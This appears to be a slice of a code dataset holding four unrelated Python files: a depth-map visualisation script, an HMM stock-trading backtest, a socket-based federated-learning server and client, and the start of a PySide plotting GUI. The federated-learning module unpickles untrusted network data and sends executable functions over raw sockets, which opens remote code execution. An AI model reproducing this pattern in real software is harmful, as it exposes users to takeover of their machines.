outputs[('disp', 0)]\n scaled_disp, depthMap = disp_to_depth(dispMap, 0.1, 100)\n depthMap = depthMap * STEREO_SCALE_FACTOR\n # _, mul_depthMap = disp_to_depth(outputs[('mul_disp', 0)], 0.1, 100)\n # mul_depthMap = mul_depthMap * STEREO_SCALE_FACTOR\n\n if viewDispUp:\n fig_dispup = compDispUp.visualize(scaled_disp, viewindex=index)\n\n if viewSmooth:\n rgb = inputs[('color_aug', 0, 0)]\n smoothfig = comSmooth.visualize(rgb=rgb, disp=scaled_disp, viewindex=index)\n\n if useGtSeman:\n fig_seman = tensor2semantic(inputs['seman_gt'], ind=index, isGt=True)\n else:\n fig_seman = tensor2semantic(outputs[('seman', 0)], ind=index)\n\n if viewSemanReg:\n foregroundType = [11, 12, 13, 14, 15, 16, 17, 18] # person, rider, car, truck, bus, train, motorcycle, bicycle\n softmaxedSeman = F.softmax(outputs[('seman', 0)], dim=1)\n forePredMask = torch.sum(softmaxedSeman[:,foregroundType,:,:], dim=1, keepdim=True)\n foreGtMask = torch.ones(dispMap.shape).cuda().byte()\n\n for m in foregroundType:\n foreGtMask = foreGtMask * (inputs['seman_gt'] != m)\n foreGtMask = 1 - foreGtMask\n foreGtMask = foreGtMask.float()\n\n forePredMask[forePredMask > 0.5] = 1\n forePredMask[forePredMask <= 0.5] = 0\n\n forePredMask = foreGtMask\n rdSampleSeman.visualizeBorderSample(dispMap, forePredMask, gtMask=foreGtMask, viewIndex=index)\n\n\n cm = plt.get_cmap('magma')\n viewForePred = forePredMask[index, :, :, :].squeeze(0).detach().cpu().numpy()\n viewForePred = (cm(viewForePred) * 255).astype(np.uint8)\n # pil.fromarray(viewForePred).show()\n\n viewForeGt = foreGtMask[index, :, :, :].squeeze(0).detach().cpu().numpy()\n viewForeGt = (cm(viewForeGt) * 255).astype(np.uint8)\n # pil.fromarray(viewForeGt).show()\n forePredictCombined = np.concatenate([viewForePred, viewForeGt], axis=0)\n # pil.fromarray(forePredictCombined).show()\n pil.fromarray(forePredictCombined).save(os.path.join(dirpath, str(idx) + '_fg.png'))\n\n if viewDepthGuess:\n wallType = [2, 3, 4] # Building, wall, fence\n roadType = [0, 1, 9] # road, sidewalk, terrain\n foregroundType = [5, 6, 7, 11, 12, 13, 14, 15, 16, 17, 18] # pole, traffic light, traffic sign, person, rider, car, truck, bus, train, motorcycle, bicycle\n\n wallTypeMask = torch.ones(dispMap.shape).cuda().byte()\n roadTypeMask = torch.ones(dispMap.shape).cuda().byte()\n foreGroundMask = torch.ones(dispMap.shape).cuda().byte()\n\n with torch.no_grad():\n for m in wallType:\n wallTypeMask = wallTypeMask * (inputs['seman_gt'] != m)\n wallTypeMask = (1 - wallTypeMask).float()\n\n for m in roadType:\n roadTypeMask = roadTypeMask * (inputs['seman_gt'] != m)\n roadTypeMask = (1 - roadTypeMask).float()\n\n for m in foregroundType:\n foreGroundMask = foreGroundMask * (inputs['seman_gt'] != m)\n foreGroundMask = (1 - foreGroundMask).float()\n originalSieze = [2048, 1024]\n # currentSize = np.array([dispMap.shape[3], dispMap.shape[2]])\n # scaleFac = np.eye(4)\n # scaleFac[0,0] = currentSize[0] / originalSieze[0]\n # scaleFac[1,1] = currentSize[1] / originalSieze[1]\n # scaleFac = torch.Tensor(scaleFac).view(1,4,4).repeat(opt.batch_size, 1, 1).cuda()\n # scaledIntrinsic = scaleFac @ inputs['realIn']\n scaledIntrinsic = inputs['realIn']\n depthGuess.visualizeDepthGuess(realDepth=depthMap, dispAct=dispMap, foredgroundMask = foreGroundMask, wallTypeMask=wallTypeMask, groundTypeMask=roadTypeMask, intrinsic= scaledIntrinsic, extrinsic=inputs['realEx'], semantic = inputs['seman_gt_eval'], cts_meta = inputs['cts_meta'], viewInd=index)\n # realDepth, foredgroundMask, wallTypeMask, groundTypeMask, intrinsic, extrinsic\n\n fig_rgb = tensor2rgb(inputs[('color', 0, 0)], ind=index)\n fig_disp = tensor2disp(outputs[('disp', 0)], ind=index)\n fig_3d, veh_coord, veh_coord_gt = tensor23dPts.visualize3d(depthMap, ind = index, intrinsic= inputs['cts_meta']['intrinsic'][index, :, :], extrinsic= inputs['cts_meta']['extrinsic'][index, :, :], gtmask=inputs['cts_meta']['mask'][index, :, :], gtdepth=inputs['cts_meta']['depthMap'][index, :, :], semanticMap=inputs['seman_gt_eval'][index, :, :])\n # check:\n # torch.inverse(inputs['invcamK'][index, :, :] @ inputs['realIn'][index, :, :]) - inputs['cts_meta']['extrinsic'][index, :, :]\n fig_grad = None\n\n if viewSurfaceNormal:\n # surnorm = compsn.visualize(depthMap = depthMap, invcamK = inputs['invcamK'].cuda(), orgEstPts = veh_coord, gtEstPts = veh_coord_gt, viewindex = index)\n surnorm = compsn.visualize(depthMap=depthMap, invcamK=inputs['invcamK'].cuda(), orgEstPts=veh_coord,\n gtEstPts=veh_coord_gt, viewindex=index)\n surnormMap = compsn(depthMap=depthMap, invcamK=inputs['invcamK'].cuda())\n\n if viewMulReg:\n depthMapLoc = depthMap / STEREO_SCALE_FACTOR\n skyId = 10\n skyMask = inputs['seman_gt'] == skyId\n skyerr = objReg.visualize_regularizeSky(depthMapLoc, skyMask, viewInd=index)\n\n\n wallType = [2, 3, 4] # Building, wall, fence\n roadType = [0, 1, 9] # road, sidewalk, terrain\n permuType = [5, 7] # Pole, traffic sign\n chanWinSize = 5\n\n wallMask = torch.ones_like(skyMask)\n roadMask = torch.ones_like(skyMask)\n permuMask = torch.ones_like(skyMask)\n\n with torch.no_grad():\n for m in wallType:\n wallMask = wallMask * (inputs['seman_gt'] != m)\n wallMask = 1 - wallMask\n wallMask = wallMask[:,:,1:-1,1:-1]\n\n for m in roadType:\n roadMask = roadMask * (inputs['seman_gt'] != m)\n roadMask = 1 - roadMask\n roadMask = roadMask[:,:,1:-1,1:-1]\n\n for m in permuType:\n permuMask = permuMask * (inputs['seman_gt'] != m)\n permuMask = 1 - permuMask\n permuMask = permuMask[:,:,1:-1,1:-1]\n\n BdErrFig, viewRdErrFig = objReg.visualize_regularizeBuildingRoad(surnormMap, wallMask, roadMask, dispMap, viewInd=index)\n\n\n padSize = int((chanWinSize-1) / 2)\n permuMask = permuMask[:, :, padSize : -padSize, padSize : -padSize]\n surVarFig = objReg.visualize_regularizePoleSign(surnormMap, permuMask, dispMap, viewInd=index)\n\n if viewBorderRegress:\n foregroundType = [5, 6, 7, 11, 12, 13, 14, 15, 16, 17, 18] # pole, traffic light, traffic sign, person, rider, car, truck, bus, train, motorcycle, bicycle\n backgroundType = [0, 1, 2, 3, 4, 8, 9, 10] # road, sidewalk, building, wall, fence, vegetation, terrain, sky\n suppressType = [255] # Suppress no label lines\n # foreGroundMask = torch.sum(inputs['seman_gt'][:, foregroundType, :, :], dim=1, keepdim=True)\n # backGroundMask = torch.sum(inputs['seman_gt'][:, backgroundType, :, :], dim=1, keepdim=True)\n foreGroundMask = torch.ones(dispMap.shape).cuda().byte()\n backGroundMask = torch.ones(dispMap.shape).cuda().byte()\n suppresMask = torch.ones(dispMap.shape).cuda().byte()\n\n with torch.no_grad():\n for m in foregroundType:\n foreGroundMask = foreGroundMask * (inputs['seman_gt'] != m)\n foreGroundMask = 1 - foreGroundMask\n for m in backgroundType:\n backGroundMask = backGroundMask * (inputs['seman_gt'] != m)\n backGroundMask = 1 - backGroundMask\n for m in suppressType:\n suppresMask = suppresMask * (inputs['seman_gt'] != m)\n suppresMask = 1 - suppresMask\n suppresMask = suppresMask.float()\n combinedMask = torch.cat([foreGroundMask, backGroundMask], dim=1).float()\n\n # borderRegFig = borderRegress.visualize_computeBorder(dispMap, combinedMask, suppresMask = suppresMask, viewIndex=index)\n borderRegFig = None\n\n else:\n borderRegFig = None\n\n # if viewBorderSimilarity:\n # foregroundType = [5, 6, 7, 11, 12, 13, 14, 15, 16, 17,\n # 18] # pole, traffic light, traffic sign, person, rider, car, truck, bus, train, motorcycle, bicycle\n # backgroundType = [0, 1, 2, 3, 4, 8, 9,\n # 10] # road, sidewalk, building, wall, fence, vegetation, terrain, sky\n # suppressType = [255] # Suppress no label lines\n # foreGroundMask = torch.ones(dispMap.shape).cuda().byte()\n # backGroundMask = torch.ones(dispMap.shape).cuda().byte()\n # suppresMask = torch.ones(dispMap.shape).cuda().byte()\n #\n # with torch.no_grad():\n # for m in foregroundType:\n # foreGroundMask = foreGroundMask * (inputs['seman_gt'] != m)\n # foreGroundMask = 1 - foreGroundMask\n # for m in backgroundType:\n # backGroundMask = backGroundMask * (inputs['seman_gt'] != m)\n # backGroundMask = 1 - backGroundMask\n # for m in suppressType:\n # suppresMask = suppresMask * (inputs['seman_gt'] != m)\n # suppresMask = 1 - suppresMask\n # suppresMask = suppresMask.float()\n # combinedMask = torch.cat([foreGroundMask, backGroundMask], dim=1).float()\n #\n # borderSimFig = borderSim.visualize_borderSimilarity(dispMap, foreGroundMask.float(), suppresMask = suppresMask, viewIndex=index)\n\n if viewRandomSample:\n foregroundType = [5, 6, 7, 11, 12, 13, 14, 15, 16, 17, 18] # pole, traffic light, traffic sign, person, rider, car, truck, bus, train, motorcycle, bicycle\n backgroundType = [0, 1, 2, 3, 4, 8, 9, 10] # road, sidewalk, building, wall, fence, vegetation, terrain, sky\n suppressType = [255] # Suppress no label lines\n foreGroundMask = torch.ones(dispMap.shape).cuda().byte()\n backGroundMask = torch.ones(dispMap.shape).cuda().byte()\n suppresMask = torch.ones(dispMap.shape).cuda().byte()\n\n with torch.no_grad():\n for m in foregroundType:\n foreGroundMask = foreGroundMask * (inputs['seman_gt'] != m)\n foreGroundMask = 1 - foreGroundMask\n for m in suppressType:\n suppresMask = suppresMask * (inputs['seman_gt'] != m)\n suppresMask = 1 - suppresMask\n suppresMask = suppresMask.float()\n foreGroundMask = foreGroundMask.float()\n\n rdSampleOnBorder.visualize_randomSample(dispMap, foreGroundMask, suppresMask, viewIndex=index)\n # rdSampleOnBorder.randomSampleReg(dispMap, foreGroundMask)\n\n\n if viewEdgeMerge:\n grad_disp = comp1dgrad(outputs[('mul_disp', 0)])\n fig_grad = tensor2disp(grad_disp, ind = index, vmax=1)\n fig_grad = fig_grad.resize([512, 256])\n\n if viewSelfOcclu:\n fl = inputs[(\"K\", 0)][:, 0, 0]\n bs = torch.abs(inputs[\"stereo_T\"][:, 0, 3])\n clufig, suppressedDisp = selfclu.visualize(dispMap, viewind=index)\n\n\n if fig_grad is not None:\n grad_seman = (np.array(fig_grad)[:, :, 0:3].astype(np.float) * 0.7 + np.array(fig_seman).astype(np.float) * 0.3).astype(np.uint8)\n # combined = [np.array(fig_disp)[:, :, 0:3], np.array(fig_grad)[:, :, 0:3], np.array(fig_seman), np.array(fig_rgb)]\n combined = [grad_seman, np.array(fig_disp)[:, :, 0:3], np.array(fig_rgb)]\n combined = np.concatenate(combined, axis=1)\n else:\n if viewSurfaceNormal and viewSelfOcclu:\n surnorm = surnorm.resize([512, 256])\n surnorm_mixed = pil.fromarray(\n (np.array(surnorm) * 0.2 + np.array(fig_disp)[:, :, 0:3] * 0.8).astype(np.uint8))\n disp_seman = (np.array(fig_disp)[:, :, 0:3].astype(np.float) * 0.8 + np.array(fig_seman).astype(\n np.float) * 0.2).astype(np.uint8)\n supprressed_disp_seman = (np.array(suppressedDisp)[:, :, 0:3].astype(np.float) * 0.8 + np.array(fig_seman).astype(\n np.float) * 0.2).astype(np.uint8)\n rgb_seman = (np.array(fig_seman).astype(np.float) * 0.5 + np.array(fig_rgb).astype(\n np.float) * 0.5).astype(np.uint8)\n\n # clud_disp = (np.array(clufig)[:, :, 0:3].astype(np.float) * 0.3 + np.array(fig_disp)[:, :, 0:3].astype(\n # np.float) * 0.7).astype(np.uint8)\n comb1 = np.concatenate([np.array(supprressed_disp_seman)[:, :, 0:3], np.array(suppressedDisp)[:, :, 0:3]], axis=1)\n comb2 = np.concatenate([np.array(disp_seman)[:, :, 0:3], np.array(fig_disp)[:, :, 0:3]], axis=1)\n comb3 = np.concatenate([np.array(surnorm_mixed)[:, :, 0:3], np.array(surnorm)[:, :, 0:3]], axis=1)\n comb4 = np.concatenate([np.array(fig_seman)[:, :, 0:3], np.array(rgb_seman)[:, :, 0:3]],\n axis=1)\n comb6 = np.concatenate([np.array(clufig)[:, :, 0:3], np.array(fig_dispup)[:, :, 0:3]], axis=1)\n\n fig3dsize = np.ceil(np.array([comb4.shape[1] , comb4.shape[1] / fig_3d.size[0] * fig_3d.size[1]])).astype(np.int)\n comb5 = np.array(fig_3d.resize(fig3dsize))\n # combined = np.concatenate([comb1, comb6, comb2, comb3, comb4, comb5], axis=0)\n combined = np.concatenate([comb1, comb2, comb4, comb3], axis=0)\n else:\n disp_seman = (np.array(fig_disp)[:, :, 0:3].astype(np.float) * 0.8 + np.array(fig_seman).astype(np.float) * 0.2).astype(np.uint8)\n rgb_seman = (np.array(fig_seman).astype(np.float) * 0.5 + np.array(fig_rgb).astype(np.float) * 0.5).astype(np.uint8)\n # combined = [np.array(disp_seman)[:,:,0:3], np.array(fig_disp)[:, :, 0:3], np.array(fig_seman), np.array(fig_rgb)]\n combined = [np.array(disp_seman)[:, :, 0:3], np.array(fig_disp)[:, :, 0:3], np.array(fig_seman),\n np.array(rgb_seman)]\n combined = np.concatenate(combined, axis=1)\n\n fig = pil.fromarray(combined)\n # fig.show()\n fig.save(os.path.join(dirpath, str(idx) + '.png'))\n if borderRegFig is not None:\n borderRegFig.save(os.path.join(dirpath, str(idx) + '_borderRegress.png'))\n # fig_3d.save(os.path.join(dirpath, str(idx) + '_fig3d.png'))\n # for k in range(10):\n # fig_disp = tensor2disp(outputs[('disp', 0)], ind=k)\n # fig_rgb = tensor2rgb(inputs[('color', 0, 0)], ind=k)\n # combined = [np.array(fig_disp)[:, :, 0:3], np.array(fig_rgb)]\n # combined = np.concatenate(combined, axis=1)\n # fig = pil.fromarray(combined)\n # fig.save(\n # os.path.join('/media/shengjie/other/sceneUnderstanding/monodepth2/internalRe/MoredispOrg' + str(k) + '.png'))\n\n\n\n # fig_rgb.save(os.path.join(svRoot, app, 'rgb' + str(idx) + '.png'))\n # fig_seman.save(os.path.join(svRoot, app, 'semantic'+ str(idx) + '.png'))\n # fig_disp.save(os.path.join(svRoot, app, 'disp'+ str(idx) + '.png'))\n # a = inputs['seman_gt_eval']\n # scaled_disp, _ = disp_to_depth(outputs[('disp', 0)], 0.1, 100)\n print(\"%dth saved\" % idx)\n # If compute the histogram\n if isHist:\n svPath = '/media/shengjie/other/sceneUnderstanding/monodepth2/internalRe/mul_channel_depth'\n carId = 13\n prob = copy.deepcopy(rec)\n ind = np.arange(prob.shape[1] * 2)\n for i in range(prob.shape[0]):\n prob[i,:] = prob[i,:] / np.sum(prob[i,:])\n for i in range(prob.shape[0]):\n trainStr = trainId2label[i][0]\n fig, ax = plt.subplots()\n rects1 = ax.bar(ind[0::2], prob[carId, :], label='obj:car')\n rects2 = ax.bar(ind[1::2], prob[i, :], label='obj:' + trainStr)\n ax.set_ylabel('Meter in percentile')\n ax.set_xlabel('Meters')\n ax.set_title('Scale Changes between scale car and scale %s' % trainStr)\n ax.legend()\n plt.savefig(os.path.join(svPath, str(i)), dpi=200)\n plt.close(fig)\n\n\n\nif __name__ == \"__main__\":\n options = MonodepthOptions()\n evaluate(options.parse())\n","sub_path":"visualize_cityscape.py","file_name":"visualize_cityscape.py","file_ext":"py","file_size_in_byte":32787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"51486203","text":"from hmmlearn.hmm import GaussianHMM\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport backtesting as bk\nimport pdb\n\nn = 3 #suppose three states\ndl = bk.dataloader.DataLoader()\ndata = dl.get_stock_data('0050', 2005, 1)\ndata = data['2012-01-01':]\nvolume = data['transaction']\nclose = data['close']\nlogDel = np.log(np.array(data['high']) - np.array(data['low']))\nlogRet_1 = np.array(np.diff(np.log(close)))#这个作为后面计算收益使用)))\nlogRet_5 = np.log(np.array(close[5:])) - np.log(np.array(close[:-5]))\nlogVol_5 = np.log(np.array(volume[5:])) - np.log(np.array(volume[:-5]))\nlogDel = logDel[5:]\nlogRet_1 = logRet_1[4:]\nclose = close[5:]\nDate = pd.to_datetime(data.index[5:])\nA = np.column_stack([logDel,logRet_5,logVol_5])\nA = np.nan_to_num(A)\nA[np.isneginf(A)] = 0\nA[np.isinf(A)] = 0\nmodel = GaussianHMM(n_components= n, covariance_type=\"full\", n_iter=2000).fit(A)\nhidden_states = model.predict(A)\nplt.figure(figsize=(25, 18))\nfor i in range(model.n_components):\n pos = (hidden_states == i)\n plt.plot_date(Date[pos], close[pos], 'o', label='hidden state %d'%i,lw=2)\n plt.legend(loc = \"left\")\nplt.show()\nres = pd.DataFrame({'Date':Date,'logRet_1':logRet_1,'state':hidden_states}).set_index('Date')\nplt.figure(figsize=(25, 18))\nfor i in range(model.n_components):\n pos = (hidden_states == i)\n pos = np.append(0,pos[:-1])#第二天进行买入操作)\n df = res.logRet_1\n res['state_ret%s'%i] = df.multiply(pos)\n plt.plot_date(Date,np.exp(res['state_ret%s'%i].cumsum()),'-',label='hidden state %d'%i)\n plt.legend(loc = 'left')\nplt.show()\nlong = (hidden_states==0) #做多))\nshort = (hidden_states==2) #做空))\nlong = np.append(0,long[:-1]) #第二天才能操作)\nshort = np.append(0,short[:-1]) #第二天才能操作)\nres['ret'] = df.multiply(long) - df.multiply(short)\nplt.plot_date(Date,np.exp(res['ret'].cumsum()),'r-')\nplt.show()\npdb.set_trace()\n","sub_path":"first_test.py","file_name":"first_test.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"196283597","text":"import dill as pickle\nimport socket\nfrom _thread import *\nimport threading\nimport sys\nimport time\nimport os\nimport tensorflow as tf\nimport numpy as np\n\nclient_subscribed = []\nweights_set = []\nlast_client = -1\nconnections = 0\nstatus = \"\"\n\nregister_client_lock = threading.Lock()\nregister_weights_lock = threading.Lock()\nnew_weights_lock = threading.Lock()\npersistentTCP_lock = threading.Lock()\n\nclass FederatedCallback(tf.keras.callbacks.Callback):\n\tdef on_epoch_end(self, epoch, logs=None):\n\t\tglobal signal\n\t\tglobal status\n\t\tif signal:\n\t\t\tprint(\"Training Interrupted\")\n\t\t\tself.model.stop_training = True\n\ndef greetServer(s):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"HELLO\"))\n\tmsg = pickle.loads(s.recv(1024))\n\treturn msg\n\ndef subscribeServer(host, port):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"SUBSCRIBE\"))\n\ndef requestModelGen(host, port):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"REQUEST MODEL FUNCTION\"))\n\tsize = pickle.loads(s.recv(1024))\n\ts.sendall(pickle.dumps(\"OK\"))\n\tmsg = pickle.loads(recvall(s,size))\n\treturn msg\n\ndef requestPreprocessing(host, port):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"REQUEST PREPROCESSING\"))\n\tsize = pickle.loads(s.recv(1024))\n\ts.sendall(pickle.dumps(\"OK\"))\n\tmsg = pickle.loads(recvall(s,size))\n\treturn msg\n\ndef requestDataCleaner(host, port):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"REQUEST DATA CLEANER\"))\n\tsize = pickle.loads(s.recv(1024))\n\ts.sendall(pickle.dumps(\"OK\"))\n\tmsg = pickle.loads(recvall(s,size))\n\treturn msg\n\ndef requestWeights(host, port):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"REQUEST WEIGHTS\"))\n\tsize = pickle.loads(s.recv(1024))\n\ts.sendall(pickle.dumps(\"OK\"))\n\tmsg = pickle.loads(recvall(s,size))\n\treturn msg\n\ndef sendWeights(host, port, weights):\n\ts = connect(host, port)\n\ts.sendall(pickle.dumps(\"SENDING WEIGHTS\"))\n\tack = pickle.loads(s.recv(1024))\n\tif ack == \"OK\":\n\t\tsendObject(s,weights)\n\n\ndef aggregate(weights_set):\n\tnew_weights = [np.zeros(w.shape) for w in weights_set[0]]\n\tfor w in weights_set:\n\t\tfor i in range(len(new_weights)):\n\t\t\tnew_weights[i] += w[i]/len(weights_set)\t\n\treturn new_weights\n\ndef evaluate(getModel,X,y,accuracy_cutoff):\n\tmodel = getModel()\n\tmodel.set_weights(weights)\n\tresults = model.evaluate(X, y)\n\tprint(\"accuracy: \"+str(results[1]))\n\tprint(\"loss: \"+str(results[0]))\n\tif results[1] > accuracy_cutoff:\n\t\treturn \"STOP\"\n\telse:\n\t\treturn \"CONTINUE\"\n\ndef updateClients(client_subscribed, status):\n\tpersistentTCP_lock.acquire()\n\tfor c in client_subscribed:\n\t\tc.sendall(pickle.dumps(status))\n\tpersistentTCP_lock.release()\n\n\ndef recvall(s,size):\n\tfragments = []\n\twhile size:\n\t\tchunk = s.recv(size)\n\t\tsize -= len(chunk)\n\t\tfragments.append(chunk)\n\treturn b''.join(fragments)\n\ndef sendObject(s,obj):\n\tpickled_obj = pickle.dumps(obj)\n\ts.sendall(pickle.dumps(len(pickled_obj)))\n\tack = pickle.loads(s.recv(1024))\n\tif ack == \"OK\":\n\t\ts.sendall(pickled_obj)\n\ndef persistentTCP(host, port, max_clients):\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\ts.bind((host, port))\n\ts.listen(max_clients)\n\tprint(\"socket binded to port\", port)\n\twhile True:\n\t\tc, addr = s.accept()\n\t\tpersistentTCP_lock.acquire()\n\t\tclient_subscribed.append(c)\n\t\tpersistentTCP_lock.release()\n\ndef communicate(c):\n\tglobal weights\n\tglobal last_client\n\tglobal weights_set\n\tglobal client_subscribed\n\tglobal aggregate_size\n\tglobal client_subscribed\n\tglobal connections\n\tglobal last_client\n\tconnections += 1\n\tclient_id = connections - 1\n\tregister_client_lock.release() \n\tmsg = c.recv(1024)\n\tif msg:\n\t\tmsg = pickle.loads(msg)\n\tif msg == \"HELLO\":\n\t\tc.sendall(pickle.dumps(\"HELLO\"))\n\telif msg == \"REQUEST MODEL FUNCTION\":\n\t\tsendObject(c,getModel)\n\telif msg == \"REQUEST PREPROCESSING\":\n\t\tsendObject(c,preprocessing)\n\telif msg == \"REQUEST DATA CLEANER\":\n\t\tsendObject(c,cleanData)\n\telif msg == \"REQUEST WEIGHTS\":\n\t\tsendObject(c,weights)\n\telif msg == \"SENDING WEIGHTS\":\n\t\tc.sendall(pickle.dumps(\"OK\"))\n\t\tsize = pickle.loads(c.recv(1024))\n\t\tif not new_weights_lock.locked():\n\t\t\tc.sendall(pickle.dumps(\"OK\"))\n\t\t\trecv_weights = pickle.loads(recvall(c,size))\n\t\t\tregister_weights_lock.acquire()\n\t\t\tweights_set.append(recv_weights)\n\t\t\tlast_client = client_id\n\t\t\tregister_weights_lock.release()\n\t\t\tif len(weights_set) >= aggregate_size:\n\t\t\t\ttime.sleep(wait_time)\n\t\t\t\tif last_client == client_id:\n\t\t\t\t\tnew_weights_lock.acquire()\n\t\t\t\t\tweights = aggregate(weights_set)\n\t\t\t\t\tweights_set = []\n\t\t\t\t\tstatus = evaluate(getModel,X,y,accuracy_cutoff)\n\t\t\t\t\tupdateClients(client_subscribed, status)\n\t\t\t\t\tnew_weights_lock.release()\n\t\t\t\t\tif status == \"STOP\":\n\t\t\t\t\t\tfor c in client_subscribed:\n\t\t\t\t\t\t\tc.close()\n\t\t\t\t\t\tprint(\"Threshhold Reached. Training Stopped.\")\n\n\t\telse:\n\t\t\tc.sendall(pickle.dumps(\"BUSY\"))\t\n\telse:\n\t\tc.sendall(pickle.dumps(\"REQUEST NOT ACCEPTED\"))\n\tc.close()\n\ndef connect(host,port):\n\ts = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \n\ts.connect((host,port))\n\treturn s\n\ndef train(init_weights, X, y , epochs, batchsize, host, port,training_lock):\n\tglobal signal\n\ttraining_lock.acquire()\n\tsignal = False\n\tmodel = getModel()\n\tmodel.set_weights(init_weights)\n\tmodel.fit(X, y, batch_size = batchsize, epochs = epochs, callbacks=[FederatedCallback()])\n\tprint(model.evaluate(X,y))\n\tif not signal:\n\t\tsendWeights(host,port,model.get_weights())\n\ttraining_lock.release()\n\ndef startFederatedLearning(host, port, pport, weights, modelGen, X, y, epochs = 10, batchsize = 10):\n\tglobal signal\n\tglobal getModel\n\tgetModel = modelGen\n\ttraining_lock = threading.Lock()\n\tpersistentTCP = connect(host,pport)\n\tstart_new_thread(train, (weights, X,y,epochs,batchsize,host,port,training_lock,))\n\twhile True:\n\t\tmsg = persistentTCP.recv(1024)\n\t\tif not msg:\n\t\t\ttime.sleep(1)\n\t\t\tcontinue\n\t\tstatus = pickle.loads(msg)\n\t\tweights = requestWeights(host, port)\n\t\tsignal = True\n\t\tif status == \"STOP\":\n\t\t\treturn weights\n\t\telif status == \"CONTINUE\":\n\t\t\tstart_new_thread(train, (weights, X, y, epochs, batchsize, host, port, training_lock,))\n\ndef createServer(host, port, pport, max_clients, Raggregate_size, Rwait_time, Raccuracy_cutoff, RX, Ry, RgetModel, Rpreprocessing, RcleanData):\n\tglobal wait_time\n\tglobal aggregate_size\n\tglobal accuracy_cutoff\n\tglobal getModel\n\tglobal preprocessing\n\tglobal cleanData\n\tglobal weights\n\tglobal X\n\tglobal y\n\tX = RX\n\ty = Ry\n\twait_time = Rwait_time\n\taggregate_size = Raggregate_size\n\taccuracy_cutoff = Raccuracy_cutoff\n\tgetModel = RgetModel\n\tpreprocessing = Rpreprocessing\n\tcleanData = RcleanData\n\tweights = getModel().get_weights()\n\tprint(\"At Start\")\n\tevaluate(RgetModel,X,y,70)\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\ts.bind((host, port)) \n\tprint(\"socket binded to port\", port)\n\ts.listen(max_clients*100)\n\tstart_new_thread(persistentTCP, (host ,pport, max_clients))\n\twhile True:\n\t\tc, addr = s.accept()\n\t\tregister_client_lock.acquire() \n\t\tprint('Connection ',connections,' established:', addr[0], ':', addr[1])\n\t\tstart_new_thread(communicate, (c,))\t\n","sub_path":"Eample Churn Model/federatedlearningiitp.py","file_name":"federatedlearningiitp.py","file_ext":"py","file_size_in_byte":6860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"106874315","text":"\"\"\"\nCutePlot is a platform-independent plotting program for 2-D mathematical functions.\nIncludes a feature for visualizing positive and negative log-axes together.\nJack Peterson (jack@tinybike.net)\nLicense: GPL\nLast modified: 11/14/2012 (v. 0.11)\n\"\"\"\n\nfrom __future__ import division # Int-to-float division auto-convert from Python 3\nimport sys\nfrom math import *\nfrom PySide.QtGui import *\nfrom PySide.QtCore import *\n\n# Import matplotlib backend, specify PySide\nimport matplotlib\nimport os\nmatplotlib.use('Qt4Agg')\nmatplotlib.rcParams['backend.qt4'] = 'PySide'\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar\nfrom matplotlib.figure import Figure\n\n\nclass CutePlot(QMainWindow):\n \n def __init__(self, parent=None):\n super(CutePlot, self).__init__(parent)\n \n # Default values for lower and upper bound\n self.LB_default = -10\n self.UB_default = 10\n # Create main plot area + menus + status bar\n self.create_main_frame()\n #self.textbox.setText()\n self.LB_UB_defaults()\n self.on_draw()\n self.statusBar()\n self.setWindowTitle('Graficador')\n self.create_menu()\n self.guardarImagen()\n\n def LB_UB_defaults(self):\n # Set default values for lower bound and upper bound\n self.lowerbound.setText(str(self.LB_default))\n self.upperbound.setText(str(self.UB_default))\n \n def create_main_frame(self):\n self.main_frame = QWidget()\n # 7x5 inches, 80 dots-per-inch\n self.dpi = 80\n self.fig = Figure((5, 3), dpi = self.dpi)\n self.canvas = FigureCanvas(self.fig)\n self.canvas.setParent(self.main_frame)\n \n self.is_data = False\n \n self.axes = self.fig.add_subplot(111)\n \n # axis_state keeps track of how many subplots are present\n # axis_state = 0: main plot only\n # axis_state = 1: horizontal split (quadrants 1 and 2)\n # axis_state = 2: vertical split (quadrants 1 and 4)\n # axis_state = 3: show all 4 subplots\n self.axis_state = 0\n \n self.mpl_toolbar = NavigationToolbar(self.canvas, self.main_frame)\n \n # f(x) textbox\n self.title = QLabel('<font size=4><em>f</em> (<em>x </em>) =</font>')\n self.textbox = QLineEdit()\n self.textbox.setMinimumWidth(200)\n self.connect(self.textbox, SIGNAL('returnPressed()'), self.on_draw)\n \n # Lowerbound and upperbound textboxes\n self.LB_title = QLabel('<font size=4>Min:</font>')\n self.lowerbound = QLineEdit()\n self.lowerbound.setMaximumWidth(30)\n self.connect(self.lowerbound, SIGNAL('returnPressed()'), self.on_draw)\n \n self.UB_title = QLabel('<font size=4>Max:</font>')\n self.upperbound = QLineEdit()\n self.upperbound.setMaximumWidth(30)\n self.connect(self.upperbound, SIGNAL('returnPressed()'), self.on_draw)\n \n # Plot button\n self.draw_button = QPushButton(\"&Plot\")\n self.connect(self.draw_button, SIGNAL('clicked()'), self.on_draw)\n\n # Hold checkbox\n self.hold_cb = QCheckBox(\"&Hold\")\n self.hold_cb.setChecked(False)\n self.connect(self.hold_cb, SIGNAL('stateChanged(int)'), self.on_minor_change)\n self.hold_cb.setToolTip('Prevent new plots from replacing old ones')\n self.hold_cb.setStatusTip('Prevent new plots from replacing old ones')\n \n # Log-x and log-y checkboxes\n self.logx_cb = QCheckBox(\"Log-&x\")\n self.logx_cb.setChecked(False)\n self.connect(self.logx_cb, SIGNAL('stateChanged(int)'), self.on_draw)\n self.logx_cb.setToolTip('Change x-axis to logarithmic scale')\n self.logx_cb.setStatusTip('Change x-axis to logarithmic scale')\n \n self.logy_cb = 